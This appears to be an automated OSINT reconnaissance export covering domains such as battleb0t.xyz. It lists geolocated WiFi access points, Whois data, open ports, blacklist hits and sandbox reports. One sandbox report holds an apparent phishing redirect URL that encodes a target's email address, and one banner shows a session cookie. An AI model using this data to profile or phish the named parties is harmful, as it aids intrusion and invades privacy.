| 2023-05-12 03:33:55 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | [extracted binary strings omitted] | https://funny.battleb0t.xyz/images/random_1.jpeg |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ALARM (5F:3F:FA) (Net ID: 00:02:D1:5F:3F:FA) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:44:09 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=*.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:33:55 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | [extracted binary strings omitted] | https://funny.battleb0t.xyz/images/favicon.png |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-ABFB (Net ID: 2C:99:24:4F:AB:F9) | 37.751, -97.822 |
| 2023-05-12 02:54:20 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | body{
padding-top:70px;
}
.jumbotron{
color: #2c3e50;
background-color: #ecf0f1;
}
.navbar-inverse{
color: #2c3e50;
}
.navbar-inverse .navbar-nav>li>a {
color: white;
}
.navbar-inverse .navbar-brand{
color: white;
} | https://funny.battleb0t.xyz/gallery.css |
| 2023-05-12 02:44:27 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Patreon | nwapi.battleb0t.xyz |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=lshBmhR4GSBYjKDefqIGkygGexG96Rixvbfv4WfP5q9iY7bD%2BJ8d%2FnJqoPqz7%2FLjDZIRQ0jW5G%2BSrG0ejdUc3LLQdFd%2BIoXwZdUdzxFXOZIrwBisdLoxnDYZ09vi9PExVEvG%2FnDtTw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:15 GMT", "cf-ray": "7c5f6041aa868cdc-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:32:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.15:8443 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/jonas.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.99): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:55:27 | Raw Data from RIRs | No | URLScan.io | 0 | 0 | 1 | 0 | None | [{u'sort': [1674665560412, u'ef04bede-91fb-48d6-84cd-c81b2eb86237'], u'task': {u'domain': u'ayhu.xyz', u'uuid': u'ef04bede-91fb-48d6-84cd-c81b2eb86237', u'url': u'http://ayhu.xyz/', u'visibility': u'public', u'time': u'2023-01-25T16:52:40.412Z', u'apexDomain': u'ayhu.xyz', u'method': u'manual'}, u'stats': {u'uniqIPs': 2, u'uniqCountries': 1, u'encodedDataLength': 206318, u'requests': 16, u'dataLength': 349476}, u'screenshot': u'https://urlscan.io/screenshots/ef04bede-91fb-48d6-84cd-c81b2eb86237.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/ef04bede-91fb-48d6-84cd-c81b2eb86237/', u'_id': u'ef04bede-91fb-48d6-84cd-c81b2eb86237', u'page': {u'mimeType': u'text/html', u'status': u'503', u'domain': u'ayhu.xyz', u'title': u'Just a moment...', u'url': u'https://ayhu.xyz/', u'ip': u'2a06:98c1:3121::c', u'tlsValidFrom': u'2022-12-14T04:12:07.000Z', u'asnname': u'CLOUDFLARENET, US', u'server': u'cloudflare', u'tlsIssuer': u'GTS CA 1P5', u'tlsValidDays': 89, u'country': u'US', u'redirected': u'https-only', u'apexDomain': u'ayhu.xyz', u'tlsAgeDays': 42, u'asn': u'AS13335'}}] | ayhu.xyz |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.104): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BGINET (Net ID: 00:00:C5:D7:41:64) | 34.0544, -118.244 |
| 2023-05-12 02:58:49 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://jsv3.recruitics.com/redirect?rx_cid=3394&rx_jobId=22014906&rx_url=https%3A%2F%2Fkeen-queijadas-051918.netlify.app%2F%3Fdir%3DZG5ld2VsbEBleHRyZW1lbmV0d29ya3MuY29t', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "ocsp.pki.goog"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.pki.goog"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "IsoScope_d40_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_d40_IE_EarlyTabStart_0xc28_Mutex"\n "IsoScope_d40_IESQMMUTEX_0_519"\n "IsoScope_d40_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d40_ConnHashTable<3392>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3392"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3392"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.192.64.185:443"\n "13.249.139.214:80"\n "65.8.55.18:80"\n "65.8.55.48:80"\n "65.8.55.159:80"\n "34.74.170.74:443"\n "54.230.18.32:443"\n "142.251.211.227:443"\n "172.217.14.202:443"\n "142.251.211.227:80"\n "142.251.215.227:443"\n "3.5.224.150:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "EL1FQVV9.txt" - Location: 
[%APPDATA%\\Microsoft\\Windows\\Cookies\\EL1FQVV9.txt]- [targetUID: 00000000-00003392]\n Dropped file: "NPR05TX9.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NPR05TX9.txt]- [targetUID: 00000000-00003392]\n Dropped file: "LU3J5Z5Y.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LU3J5Z5Y.txt]- [targetUID: 00000000-00003452]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "www.recaptcha_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "7D6243C18F0F8F9AEC6638DD210F1984_C4E912EA1CF7478AEFF10983696CE52E" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D6243C18F0F8F9AEC6638DD210F1984_C4E912EA1CF7478AEFF10983696CE52E]- [targetUID: 00000000-00003452]\n "KFOlCnqEu92Fr1MmEU9fBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. 
All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003392]\n "A9P3THGH.htm" has type "HTML document UTF-8 Unicode text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\0CH0OVJV\\A9P3THGH.htm]- [targetUID: 00000000-00003452]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00003452]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00003452]\n "EL1FQVV9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EL1FQVV9.txt]- [targetUID: 00000000-00003392]\n "favicon_6_.ico" has type "MS Windows icon resource - 3 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "E87CE99F124623F95572A696C80EFCAF_48A0517CBEDC34E374472FB21AABC8A8" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\E87CE99F124623F95572A696C80EFCAF_48A0517CBEDC34E374472FB21AABC8A8]- [targetUID: 00000000-00003452]\n "bframe_3_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003392]\n "_B14BACFC-3E6D-11ED-9448-08002726DE25_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "NPR05TX9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NPR05TX9.txt]- [targetUID: 00000000-00003392]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00003452]\n "styles__ltr_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62]- [targetUID: 00000000-00003452]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://jsv3.recruitics.com/redirect?rx_cid=3394&rx_jobId=22014906&rx_url=https%3A%2F%2Fkeen-queijadas-051918.netlify.app%2F%3Fdir%3DZG5ld2VsbEBleHRyZW1lbmV0d29ya3MuY29t"\n Pattern match: "https://jsv3.recruitics.com"\n Heuristic match: "o.ss2.us"\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: 
o.ss2.us"\n Heuristic match: "ocsp.rootg2.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"\n Heuristic match: "ocsp.rootca1.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"\n Heuristic match: "ocsp.sca1b.amazontrust.com"\n Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEAcWfhO7yUD4HiZydfoHjso%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"\n Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEASVeeR7RvTclo39SniAB8E%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"'}], u'threat_level': 0, u'size': None, u'job_id': u'63331f1830e7574737082cf9', u'target_url': None, u'i | 34.74.170.74 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pancakes (Net ID: 00:00:48:67:6D:D1) | 37.7813933,-122.3918002 |
| 2023-05-12 03:11:18 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | Amsterdam, North Holland, 1012, Netherlands, Europe | 188.114.97.1 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00nave198.github.io | 185.199.111.153 |
| 2023-05-12 02:46:40 | Malicious IP Address | Yes | Fraudguard | 0 | 1 | 2 | 0 | None | abuse_tracker (risk level: 4) [185.199.109.153] | 185.199.109.153 |
| 2023-05-12 02:45:52 | Physical Location | No | AbstractAPI | 0 | 0 | 4 | 0 | None | Montreal, Quebec, H4X, United States, North America | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:03:16 | Co-Hosted Site - Domain Name | No | DNS Resolver | 1 | 0 | 2 | 0 | None | nom-nom.link | funny-face-pictures.nom-nom.link |
| 2023-05-12 02:54:16 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | https://oldfluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset="utf-8"
Date: <REDACTED>
Cache-Control: no-cache, no-store, must-revalidate, private
Pragma: no-cache
Set-Cookie: cprelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: cpsession=%3aQkwdhfWxmK8h0n7J%2c873f8738210af1095901a669c6d9b2d7; HttpOnly; path=/; port=2083; secure
Set-Cookie: roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2083; secure
Set-Cookie: PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083
Cache-Control: no-cache, no-store, must-revalidate, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Content-Length: 12472
| 87.248.157.102 |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.209): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | inaturalist (Category: hobby)
https://inaturalist.nz/people/login | login |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan22 (Net ID: 00:02:6F:04:8F:03) | 37.7642, -122.3993 |
| 2023-05-12 02:54:57 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2a06:98c1:3120::1:80 | 2a06:98c1:3120::1 |
| 2023-05-12 02:54:23 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | https://www.ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 02:46:27 | Netblock Membership | No | RIPE | 2 | 0 | 2 | 0 | None | 172.67.128.0/20 | 172.67.135.9 |
| 2023-05-12 02:59:47 | Affiliate - Domain Whois | No | Whois | 4 | 0 | 3 | 0 | None | Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2015-10-20T06:46:53Z
Creation Date: 2009-02-17T22:08:05Z
Registry Expiry Date: 2024-02-17T22:08:05Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARE.NET
Name Server: NS2.CLOUDFLARE.NET
Name Server: NS3.CLOUDFLARE.NET
Name Server: NS4.CLOUDFLARE.NET
Name Server: NS5.CLOUDFLARE.NET
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 90F710A107DA51ED78125D30A68704CF3C0308AFD01BFCD7057D4BD03B62C68B
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2022-03-16T19:39:08Z
Creation Date: 2009-02-17T22:08:05Z
Registrar Registration Expiration Date: 2024-02-17T22:08:05Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Name Server: ns1.cloudflare.net
Name Server: ns2.cloudflare.net
Name Server: ns3.cloudflare.net
Name Server: ns4.cloudflare.net
Name Server: ns5.cloudflare.net
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
| cloudflare.net |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | youpic (Category: hobby)
https://youpic.com/photographer/login | login |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | AP Checkpoint (Net ID: 00:02:6F:B8:A2:4E) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:52:50 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [raw Hybrid Analysis sandbox report JSON omitted] | 185.199.108.153 |
| 2023-05-12 03:41:52 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | Microsoft HTTP API 2.0 | 45.131.109.53 |
| 2023-05-12 03:00:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.40): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:32:34 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.17:8443 | 188.114.97.0/24 |
| 2023-05-12 02:57:54 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [raw Hybrid Analysis sandbox report JSON omitted] | 34.148.97.127 |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.118 | 35.229.48.116 |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.194): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:12:10 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | Web analytics | baffin.netcraft.com |
